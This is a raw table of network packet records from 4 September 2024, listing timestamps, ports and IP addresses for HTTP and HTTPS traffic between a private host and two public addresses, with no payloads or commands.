Sep 4, 2024 17:37:09.466423035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466434956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466434956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466447115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466458082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466458082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466470957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466480970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466491938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466500044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466500044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466514111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466525078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466533899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466542006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466543913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466562033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466568947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466573000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466583014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466584921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466595888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466598034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466609001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466617107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466620922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466633081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466639042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466644049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466655970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466667891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466670990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466691017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466691971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466703892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466710091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466722965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466731071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466732025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466739893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466763973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527139902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527149916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527162075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527208090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527220011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527229071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527240038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527297020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527339935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527349949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527358055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527369022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527376890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527384043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527386904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527398109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527403116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527420044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527435064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527471066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527483940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527508974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527519941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527538061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527554035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527561903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527573109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527580023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527582884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527606010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527626991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.527707100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.527749062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543247938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543308020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543328047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543359995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543369055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543369055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543392897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543404102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543438911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543481112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543484926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543524981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543546915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543601990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543658972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543669939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543704033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543771982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543811083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543889046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543900013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543910980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543934107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543946028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543955088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543956041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543966055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543976068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543984890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.543987036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.543998957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544011116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544085979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544095993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544106960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544120073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544120073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544131994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544142008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544167995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544184923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544225931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544323921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544337034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544346094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544354916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544363976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544373035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544374943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544374943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544383049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544394016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544401884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544404984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544419050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544425011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544437885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544461012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544620037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544631004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544639111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544647932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544661045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544661045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544672012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544681072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544681072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544689894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544697046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544723988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544737101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544739962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544773102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544866085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544878006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544886112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544895887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544904947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544909954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544924021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544929028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544935942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544945002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544951916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544955015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544965982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544974089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544982910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.544990063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.544992924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545003891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545006037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545013905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545022011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545023918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545027971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545032024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545037985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545048952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545052052 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545059919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545069933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545073986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545082092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545106888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545373917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545384884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545393944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545419931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545432091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545527935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545538902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545551062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545561075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545572996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545579910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545589924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545593977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545598984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545609951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545610905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545619965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545629025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545634985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545638084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545650959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545658112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545660019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545666933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545667887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545679092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545687914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545691967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545698881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545707941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545715094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545720100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545722008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.545742989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.545754910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.546334982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546344995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546353102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546361923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546371937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546379089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.546382904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546391010 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546399117 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546400070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.546427011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.546441078 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.546453953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.546459913 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546499968 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.546622992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.546665907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.546766043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546782017 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546825886 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.546833992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.546875000 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.547270060 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547292948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547333002 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.547339916 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547349930 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.547370911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.547677040 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547697067 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547740936 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.547749043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.547791958 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.548093081 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.548108101 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.548146963 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.548154116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.548167944 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.548193932 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.549468994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.549483061 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.549530029 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.549536943 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.549573898 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.550877094 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.550889969 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.550935030 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.550940990 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.550976038 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.551363945 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.551378012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.551424026 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.551431894 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.551464081 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.552711964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552745104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552757978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552772999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.552789927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.552812099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552823067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552836895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552864075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.552867889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552870989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.552879095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.552911043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553153038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553180933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553191900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553203106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553215027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553282022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553298950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553308964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553319931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553324938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553329945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553345919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553349018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553359032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553369045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553370953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553380013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553401947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553409100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553412914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553421974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553431034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553436995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553458929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553900003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553911924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553921938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.553945065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553966045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.553992033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554003000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554012060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554023027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554032087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554033041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554056883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554076910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554080963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554095030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554130077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554264069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554275990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554284096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554302931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554311991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554316044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554322004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554325104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554332018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554337025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.554342985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.554352999 CEST	80	49719	147.45.44.104	192.168.2.6
